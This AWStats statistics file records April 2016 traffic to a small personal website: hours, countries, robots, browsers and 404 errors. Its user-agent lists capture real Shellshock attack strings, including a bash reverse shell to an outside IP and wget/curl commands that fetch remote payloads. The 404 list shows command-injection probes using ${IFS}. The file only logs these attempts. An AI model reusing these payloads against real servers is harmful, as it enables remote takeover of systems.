AWSTATS DATA FILE 6.8 (build 1.910)
# If you remove this file, all statistics for date 201604 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 1915                
POS_TIME 2593                
POS_VISITOR 11900               
POS_DAY 16130               
POS_DOMAIN 3364                
POS_LOGIN 3866                
POS_ROBOT 4021                
POS_WORMS 4525                
POS_EMAILSENDER 4656                
POS_EMAILRECEIVER 4799                
POS_SESSION 16845               
POS_SIDER 17025               
POS_FILETYPES 4934                
POS_OS 5109                
POS_BROWSER 5217                
POS_SCREENSIZE 5531                
POS_UNKNOWNREFERER 5605                
POS_UNKNOWNREFERERBROWSER 7198                
POS_ORIGIN 7783                
POS_SEREFERRALS 7924                
POS_PAGEREFS 8081                
POS_SEARCHWORDS 8349                
POS_KEYWORDS 8501                
POS_MISC 2257                
POS_ERRORS 8560                
POS_CLUSTER 3722                
POS_SIDER_404 8662                
POS_PLUGIN_geoip_city_maxmind 10619               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20160501003358 25 3741 11093207816633
FirstTime 20160401021815
LastTime 20160430203132
LastUpdate 20160501064323 25 0 24 0 0
TotalVisits 156                 
TotalUnique 105                 
MonthHostsKnown 0                   
MonthHostsUnknown 109                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 6 11 220375 35 42 187974
1 4 9 215821 23 30 245198
2 6 12 234311 11 168 139969
3 17 43 1175606 26 42 189441
4 4 23 1090056 21 25 59203
5 13 25 464945 20 332 282398
6 13 13 82884 24 24 74407
7 5 5 22770 19 25 58278
8 14 19 261361 27 35 86477
9 2 2 9108 9 13 138833
10 10 25 638355 14 29 28653
11 13 13 59202 32 34 95801
12 3 4 11158 23 25 132103
13 9 23 517877 16 30 237435
14 8 11 116063 13 14 49818
15 8 8 36432 27 35 228014
16 6 6 22929 17 17 68034
17 1 6 202159 12 17 36464
18 37 40 273585 173 299 2906575
19 12 13 52537 66 102 902142
20 7 7 27324 54 81 743291
21 2 2 9108 27 30 63594
22 4 10 217871 20 25 75186
23 3 8 211267 16 23 104553
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 21
us 124 139 960627
unknown 17 27 463520
kr 15 73 2659757
de 13 13 59812
cn 9 9 39246
br 6 34 1094980
eu 6 6 27324
fr 3 3 13662
cl 2 2 9108
jp 1 1 4554
ph 1 6 202159
ru 1 1 4554
no 1 1 4554
ro 1 1 4554
gb 1 1 4554
id 1 6 202159
vn 1 1 4554
hk 1 6 202159
ca 1 6 202159
ar 1 1 4554
lt 1 1 4554
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 10
spider 360 4165230 20160430203134 0
bot[+:,\.\;\/\\-] 137 987886 20160429222639 0
yandex 67 524882 20160427191822 0
googlebot 34 501918 20160428155407 0
no_user_agent 25 112110 20160428080148 0
mj12bot 20 184588 20160430163148 0
archive\.org_bot 10 220985 20160404090051 0
netcraft 3 4554 20160407031740 0
crawl 3 11922 20160421205653 0
surveybot 2 9108 20160423232346 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 50 1643801 0 0
png 44 2170173 0 0
hwp 2 58368 0 0
html 203 902352 0 0
jpg 14 1350708 0 0
js 23 47150 0 0
Unknown 2 552 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 7
macosx 11
winlong 1
winxp 8
win2003 10
winnt 231
Unknown 36
linux 41
END_OS

# Browser ID - Hits
BEGIN_BROWSER 21
firefox28.0 1
msie6.0 4
firefox44.0 4
opera 1
firefox29.0 5
curl 4
firefox45.0 1
firefox2.0.0.13 1
msie8.0 28
mozilla 7
firefox43.0 3
netscape5.0 2
msie7.0 10
firefox14.0.1 8
firefox41.0 1
firefox3.6.3 1
firefox40 1
msie9.0 33
Unknown 27
firefox11.0 2
safari 194
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 17
curl/7.29.0 20160413194025
StatsInfo 20160401021815
()_{_:;_};_/bin/sh_-c_'wget_http://176.126.85.127:8080/starwars_-O_/dev/null;wget1_http://176.126.85.127:8080/starwars_-O_/dev/null;curl_http://176.126.85.127:8080/starwars_-o_/dev/null;/usr/sfwbin/wget_http://176.126.85.127:8080/starwars;fetch_-/dev/null_http://176.126.85.127:8080/starwars' 20160427140431
Go_http_package 20160427202125
semanticbot 20160429030725
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20160425012841
Mozilla/5.0_(Windows_10;_WOW64;_rv:41.0)_Gecko/20100101_Firefox/41.0 20160421153407
Opera/9.80_(J2ME/MIDP__Opera_Mini/4.2.18887/24.746__U__ru)_Presto/2.5.25_Version/10.54 20160418141408
www.probethenet.com_scanner 20160418224859
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/144.168.45.117/16161_0<&1_2>&1_& 20160417160011
()_{_:;_};_/bin/sh_-c_'wget_http://closettransfer.com/umbrella.cgi_-O_/dev/null;wget1_http://closettransfer.com/umbrella.cgi_-O_/dev/null;curl_http://closettransfer.com/umbrella.cgi_-o_/dev/null;/usr/sfwbin/wget_http://closettransfer.com/umbrella.cgi;fetch_-/dev/null_http://closettransfer.com/umbrella.cgi' 20160429190938
Mozilla/5.0_zgrab/0.x 20160413023420
Mozilla/5.0_(compatible;_Nmap_Scripting_Engine;_http://nmap.org/book/nse.html) 20160417120330
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/144.168.45.117/16161_0<&1_2>&1 20160415195219
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20160411065807
WWW-Mechanize/1.73 20160421114839
curl/7.38.0 20160404205239
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 9
StatsInfo 20160401021815
Go_http_package 20160427202125
semanticbot 20160429030725
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20160425012841
www.probethenet.com_scanner 20160418224859
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/144.168.45.117/16161_0<&1_2>&1_& 20160417160011
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/144.168.45.117/16161_0<&1_2>&1 20160415195219
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20160411065807
WWW-Mechanize/1.73 20160421114839
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 149 155
From1 0 0
From2 31 31
From3 17 17
From4 10 135
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 1
google 31 31
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 4
http://top1-seo-service.com/try.php 11 11
http://burger-imperia.com 4 4
http://hvd-store.com 1 1
http://hundejo.com 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
400 10 3615
404 826 407043
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 57
//phpmyadmin/scripts/setup.php 1 -
/sitemap.xml 3 -
/slideshow/img1.jpg 142 http://kimsuntae.com/
/server-status 1 -
/robots.txt 118 -
/wordpress/ 2 -
/5contact.html 2 -
/web-console/ServerInfo.jsp 1 -
http://www.baidu.com/cache/global/img/gs.gif 4 -
/jnavkqdf.html 1 -
/ggrozoym.html 1 -
/slideshow/img2.jpg 122 http://kimsuntae.com/
/language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DDsbi%3EF4xO&&tar$%7BIFS%7D/string.js 1 -
/redirect.php 1 -
/blog/ 1 -
//MyAdmin/scripts/setup.php 1 -
/wp/ 1 -
/muieblackcat 1 -
http://www.baidu.com/robots.txt 4 -
/css/reset.css 68 http://www.google.com/url
/xmlrpc.php 9 -
/fnmdrzkrtslvqfk.html 1 -
/fpsiydwqgwd.html 1 -
/images/biopic.png 2 http://kimsuntae.com/2Bio.html
//myadmin/scripts/setup.php 1 -
/language/Swedish$%7BIFS%7D&&echo$%7BIFS%7Dx6Yj%3EXbpo&&tar$%7BIFS%7D/string.js 1 -
/language/Swedish$%7BIFS%7D&&echo$%7BIFS%7Dxtko%3EVHGO&&tar$%7BIFS%7D/string.js 1 -
/CHANGELOG.txt 7 -
/statics/house5-style1/sea/js/sea.js 1 -
/jpg/image.jpg 2 -
/blog/robots.txt 1 -
http://testp5.mielno.lubin.pl/testproxy.php 1 -
/th1s_1s_a_4o4.html 30 http://www.google.com/url
/language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DFP5Z%3EIJvK&&tar$%7BIFS%7D/string.js 1 -
/struts/utils.js 1 -
/administrator/manifests/libraries/joomla.xml 2 -
/administrator/index.php 1 -
/3media.html 1 -
/language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DNJiK%3EUh8J&&tar$%7BIFS%7D/string.js 1 -
/readme.html 7 -
/irj/portal 1 -
/admin 1 -
/skin/error.php 1 -
/administrator/ 4 -
/ts.php 1 -
/manager/html 3 -
/slideshow/img3.jpg 120 http://kimsuntae.com/
//phpMyAdmin/scripts/setup.php 1 -
/Fonts/Dosis-Bold.ttf 12 http://kimsuntae.com/2Bio.html
/slideshow/img4.jpg 117 http://kimsuntae.com/
/wp-login.php 3 -
/2bio.html 1 -
/joomla.xml 2 -
/css/Fonts/Dosis-Bold.ttf 8 http://kimsuntae.com/css/contact.css
//pma/scripts/setup.php 1 -
/crttnzgajlysfte.html 1 -
/4gallery.html 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 39
unknown 0 161 0 0
us_chicago_il 0 31 0 0
kr_seoul_11 0 15 0 0
us_washington_dc 0 10 0 0
us_kansas%20city_mo 0 9 0 0
us_sterling_va 0 9 0 0
us_ann%20arbor_mi 0 8 0 0
us_woodbridge_nj 0 8 0 0
de_kiez_12 0 7 0 0
us_san%20antonio_tx 0 6 0 0
us_raleigh_nc 0 1 0 0
us_louisville_ky 0 1 0 0
br_viamão_23 0 6 0 0
us_san%20diego_ca 0 2 0 0
us_reno_nv 0 1 0 0
cn_beijing_22 0 2 0 0
gb_cambridge_c3 0 1 0 0
us_simsbury_ct 0 4 0 0
us_norwalk_ct 0 2 0 0
cn_chaoyang_19 0 3 0 0
us_campbell_ca 0 1 0 0
hk_tuen%20mun_00 0 6 0 0
br_vila%20velha_08 0 6 0 0
cn_quanzhou_07 0 1 0 0
us_overland%20park_ks 0 6 0 0
us_oklahoma%20city_ok 0 2 0 0
us_simi%20valley_ca 0 1 0 0
no_trondheim_16 0 1 0 0
us_mcallen_tx 0 1 0 0
cl_concepción_06 0 2 0 0
us_denver_co 0 1 0 0
ca_ottawa_on 0 5 0 0
ro_valcea_39 0 1 0 0
us_seattle_wa 0 1 0 0
br_são%20josé%20dos%20campos_27 0 6 0 0
us_wilmington_de 0 4 0 0
ca_kelowna_bc 0 1 0 0
ru_istra_47 0 1 0 0
us_las%20vegas_nv 0 4 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 109
182.231.250.169 13 58 1776502 20160416042158
184.154.36.186 10 10 45540 20160430203132
69.58.178.59 9 9 64668 20160411065841
184.154.36.183 7 7 31878 20160429195451
38.100.21.61 7 10 136355 20160405180438
136.243.48.86 6 6 27934 20160402185729
184.154.36.185 6 6 27324 20160428193437
54.153.33.145 5 5 22770 20160411185400
141.212.122.161 5 5 22770 20160427202125
184.154.36.184 4 4 18216 20160423184037
119.246.14.43 1 6 202159 20160408234239
69.30.202.227 1 1 4554 20160418100224
173.208.197.250 1 1 4554 20160420160743
182.118.60.15 1 1 4554 20160430130748
128.232.110.28 1 1 4554 20160415195557
13.90.208.117 2 2 4554 20160408002248
185.35.62.11 1 1 4554 20160406154939
173.208.197.251 1 1 4554 20160409133609
86.126.97.83 1 1 4554 20160407154528
179.110.205.20 1 6 202159 20160403102738
74.142.144.19 1 1 4554 20160413194025
69.197.189.138 2 2 9108 20160404083135
171.25.193.20 1 1 4554 20160411054159
202.124.193.2 1 6 202159 20160407010923
207.46.13.18 0 1 2050 
120.132.50.135 3 3 13662 20160409115630
150.70.173.56 1 1 4554 20160430144017
50.57.74.78 2 2 9108 20160401052838
107.150.32.58 1 1 4554 20160410060325
54.211.83.47 1 1 4554 20160412064849
195.20.133.161 4 4 18216 20160420102725
36.80.236.80 1 6 202159 20160408221355
107.150.32.61 1 1 4554 20160404080209
173.208.197.254 1 1 4554 20160424184501
54.233.91.138 1 1 4554 20160407110526
5.39.222.159 3 3 13662 20160425012841
184.154.36.171 3 3 13662 20160426202502
5.135.158.101 1 1 4554 20160419214105
107.150.46.34 2 2 9108 20160420131801
63.85.168.52 4 4 18216 20160423112318
69.30.226.102 1 1 4554 20160410084609
131.253.25.199 0 5 197605 
167.114.233.118 1 1 4554 20160420144948
66.240.213.93 1 1 4554 20160407055343
107.150.46.37 1 1 4554 20160418100226
199.30.24.151 0 1 2050 
185.70.184.192 1 1 4554 20160419152505
52.35.69.26 1 1 4554 20160408002055
152.74.16.138 2 2 9108 20160401110344
193.90.12.88 1 1 4554 20160410154647
206.225.84.189 1 6 202159 20160425050456
24.71.248.218 1 1 4554 20160429190938
69.30.202.226 1 1 4554 20160423222855
74.91.20.194 1 1 4554 20160424184834
5.206.88.106 1 1 4554 20160428092204
141.212.122.209 2 2 9108 20160415122132
67.50.85.66 1 1 4554 20160430143934
5.149.254.109 1 1 4554 20160418141408
209.126.230.71 1 1 4554 20160401021815
184.72.182.234 1 1 4554 20160427204425
107.150.46.38 2 2 9108 20160424141306
185.56.82.129 1 1 4554 20160401032236
95.183.50.235 1 1 4554 20160410012532
141.212.122.193 1 1 4554 20160405185033
144.168.45.117 3 3 5106 20160417160011
177.13.26.26 1 6 202159 20160405174425
74.91.18.45 1 1 4554 20160423082937
64.74.197.103 1 1 4554 20160427140431
69.30.202.228 1 1 4554 20160420132918
185.100.85.132 1 1 4554 20160429162533
54.149.253.151 1 1 4554 20160426064051
52.39.138.101 1 1 4554 20160421114839
189.36.193.174 1 6 202159 20160405080926
69.197.185.21 1 1 4554 20160412162023
191.19.161.90 1 6 202159 20160402130548
36.248.115.92 2 2 7368 20160420032447
69.197.185.20 1 1 4554 20160409162212
72.52.75.27 1 1 4554 20160428154211
69.197.185.18 1 1 4554 20160422102358
201.75.170.95 1 6 202159 20160404104834
104.41.147.198 3 3 9108 20160429030725
192.154.110.26 2 5 88739 20160424132349
78.47.47.188 2 2 9108 20160425001625
195.12.190.38 1 1 4554 20160410071719
185.112.102.170 1 1 0 20160404205239
203.250.147.3 2 15 883255 20160415040053
201.66.147.226 1 6 202159 20160402130515
14.181.57.249 1 1 4554 20160411211713
195.154.33.129 2 2 9108 20160428035415
104.128.144.131 1 1 4554 20160418224859
69.197.185.19 1 1 4554 20160406084040
120.42.112.116 1 1 4554 20160413082830
69.30.198.146 2 2 9108 20160418115055
109.22.232.225 1 1 4554 20160423150030
181.30.30.166 1 1 4554 20160421153407
52.39.106.220 1 1 4554 20160421114839
177.13.26.19 1 4 84185 20160404143443
138.201.20.12 1 1 4554 20160424233740
37.9.41.202 1 1 4554 20160424000807
107.170.174.151 4 4 18216 20160412055816
52.39.108.191 1 1 4554 20160421114839
207.46.13.133 0 2 4100 
69.30.202.229 1 1 4554 20160412190607
37.187.52.39 4 4 18216 20160415075133
187.115.231.168 1 6 202159 20160405100120
123.59.59.52 2 2 9108 20160430034138
74.91.23.108 2 2 9108 20160423193923
208.100.26.230 1 1 0 20160417120330
209.114.36.145 4 4 18216 20160422083054
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20160401 13 30 953408 7
20160402 10 20 441360 5
20160403 3 8 211267 3
20160404 6 14 300006 6
20160405 12 30 751940 6
20160406 4 4 18216 4
20160407 7 12 229483 7
20160408 8 18 427088 7
20160409 5 10 220375 5
20160410 9 9 40986 9
20160411 18 34 533362 7
20160412 9 9 40986 6
20160413 5 5 22770 5
20160414 1 1 4554 1
20160415 10 23 915526 6
20160416 5 17 418156 3
20160417 3 3 4713 3
20160418 7 7 31878 7
20160419 4 4 18216 4
20160420 11 11 48354 7
20160421 5 5 22770 5
20160422 7 7 31878 4
20160423 9 9 40986 6
20160424 9 12 120617 8
20160425 4 9 215821 4
20160426 2 2 9108 2
20160427 6 9 33474 6
20160428 4 5 20266 4
20160429 6 6 22770 4
20160430 5 5 22770 5
END_DAY

# Session range - Number of visits
BEGIN_SESSION 4
0s-30s 148
15mn-30mn 1
30s-2mn 6
30mn-1h 1
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 14
/ 169 751410 147 138
/5Contact.html 7 19698 0 4
/3Media.html 6 15888 0 1
/2Bio.html 5 48080 0 0
/4Gallery.html 5 18740 0 2
/1home.html 4 18216 1 1
/introduction.hwp 2 58368 0 1
/cgi-bin/test-cgi 2 552 2 2
http://www.qyer.com/ 2 9108 2 2
/4Gallery-view.html 1 2996 0 1
http://www.elong.com/ 1 4554 1 1
http://www.qunar.com/ 1 4554 1 1
http://www.ctrip.com/ 1 4554 1 1
http://env.darkbyte.ru/ 1 4554 1 1
END_SIDER
